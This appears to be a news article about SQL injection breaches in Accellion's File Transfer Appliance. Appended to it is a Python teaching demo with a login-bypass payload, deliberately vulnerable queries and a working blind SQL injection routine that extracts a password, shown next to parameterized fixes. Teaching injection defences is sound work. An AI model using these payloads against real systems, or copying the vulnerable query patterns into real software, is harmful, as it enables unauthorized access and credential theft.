Several data breaches stemming from unpatched vulnerabilities in Accellion's File Transfer Appliance have been revealed. New Zealand's Reserve Bank is one victim of a breach involving Accellion's FTA product.

What went wrong? Where does the fault lie? And what can organizations do about it?

It's not a straightforward story, and it points to problems around balancing the use of an aging software product against risk, a reluctance to move onto a newer platform and internal patching hiccups.

It's prudent for those still using Accellion's FTA to wean themselves off of it if possible.

To recap: Accellion, a privately held company based in Palo Alto, California, developed the File Transfer Appliance as a secure way to overcome the size limits imposed on email attachments. Recipients get links to files hosted on the FTA, which can then be downloaded. The product is nearly 20 years old, yet it's still used by hundreds of organizations in the finance, government and insurance sectors to transfer sensitive files.

Accellion prides itself on secure file sharing, so the appliance, given its age and wide use, is a juicy target. Over the last seven weeks or so, several SQL injection and other vulnerabilities have emerged in the product.

Joel York, Accellion's chief marketing officer, tells me that a recent external audit of FTA found no problems and claimed the vulnerabilities were hard to find. He likened Accellion's situation to that of other companies such as FireEye and Microsoft, which were among the many organizations hit by the SolarWinds incident (see Microsoft Describes How SolarWinds Hackers Avoided Detection). "We have very thorough processes."

But a batch of SQL injection vulnerabilities uncovered in an aging product is very different from a supply chain compromise involving the infiltration of a company's build infrastructure.

In mid-December, Accellion patched a SQL injection vulnerability in FTA and privately notified its customers. But that was just the first of a series of vulnerabilities that have been found. The Australian security podcast writes that the issues include a SQL injection flaw in the FTA web interface, an XSS flaw in FTA's file manager, a blind SQL injection and command injection flaw in FTA's administrative interface, and an unauthorized upload vulnerability.

On Monday, a new victim came forward that stirred more attention. The Washington State Auditor's Office says personal information related to 1.6 million unemployment claims on its FTA may have been exposed (see Washington State Breach Tied to Accellion Vulnerability).

Until Washington's announcement, Accellion's problems had stayed in the southern hemisphere. The Reserve Bank of New Zealand was the first organization to come forward, on Jan. 11, about a breach tied to Accellion's FTA, followed by Australia's securities regulator, ASIC, and an Australian law firm (see Australian Financial Regulator Hit by Data Breach).

Following New Zealand's disclosure, Accellion estimated there were fewer than 50 customers affected, but York says that figure could be in flux now.

Although there was much York says he can't comment on, he did provide some background on what Accellion has faced. After the first vulnerability was patched in December, the attackers came after the FTA again and again, he says. Web searches turn up public-facing portals for customers apparently still using FTA.
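The vulnerability classes named above (a plain SQL injection in a login-style query and a blind SQL injection against an endpoint that only answers yes or no) are illustrated below in Python against an in-memory SQLite table. This is an added example, not Accellion's code and not a description of how FTA is built; the `users` table, the credentials in it, the `user_exists` endpoint and the `substr`-based extraction payload are all constructed for the illustration. It shows why a "found no problems" audit of string-built queries is not reassuring: the hardened forms differ from the vulnerable ones only by using placeholders, and that one change defeats both the login bypass and the character-by-character extraction.

```python
import sqlite3

# Constructed sample data for the illustration; the secret is fictional.
SEED_USERS = [
    ("admin", "correct horse battery staple", 1),
    ("alice", "hunter2", 0),
]


def make_db():
    """Build a throwaway SQLite database standing in for an appliance's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, is_admin) VALUES (?, ?, ?)",
        SEED_USERS,
    )
    return conn


def login_vulnerable(conn, username, password):
    """Classic SQL injection: input is spliced into the query text, so a quote
    in the username changes the statement's structure instead of its data."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Hardened form: the SQL text is fixed and the input is bound as data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def user_exists_vulnerable(conn, username):
    """A yes/no endpoint that returns no record contents, only whether the
    query matched. That single bit is enough for blind SQL injection."""
    sql = f"SELECT 1 FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchone() is not None


def user_exists_parameterized(conn, username):
    """Same endpoint with a bound parameter: the payload is just a username."""
    return conn.execute(
        "SELECT 1 FROM users WHERE username = ?", (username,)
    ).fetchone() is not None


def blind_extract_password(oracle, target_user,
                           charset="abcdefghijklmnopqrstuvwxyz ", max_len=64):
    """Recover target_user's password one character at a time from a
    true/false oracle. Each probe appends a condition on SQLite's substr();
    the trailing '-- ' comments out the closing quote the application adds.
    Stops when no character in charset matches (end of value, or a character
    outside the charset)."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            payload = f"{target_user}' AND substr(password, {pos}, 1) = '{ch}' -- "
            if oracle(payload):
                recovered += ch
                break
        else:
            break
    return recovered


def demo():
    """Run both attacks against the vulnerable and the hardened endpoints."""
    conn = make_db()
    bypass = "' OR 1=1 -- "   # turns the WHERE clause into a tautology
    return {
        "vulnerable_login_bypass": login_vulnerable(conn, bypass, "x"),
        "parameterized_login_bypass": login_parameterized(conn, bypass, "x"),
        "blind_extract_vulnerable": blind_extract_password(
            lambda u: user_exists_vulnerable(conn, u), "admin"),
        "blind_extract_parameterized": blind_extract_password(
            lambda u: user_exists_parameterized(conn, u), "admin"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Against the vulnerable functions the bypass logs in as the first user in the table and the blind probe walks out the whole admin password with roughly 27 requests per character; against the parameterized functions the same payloads are looked up as literal usernames and match nothing. The payload syntax (`substr`, `-- `) is SQLite's and would need adjusting for another database engine.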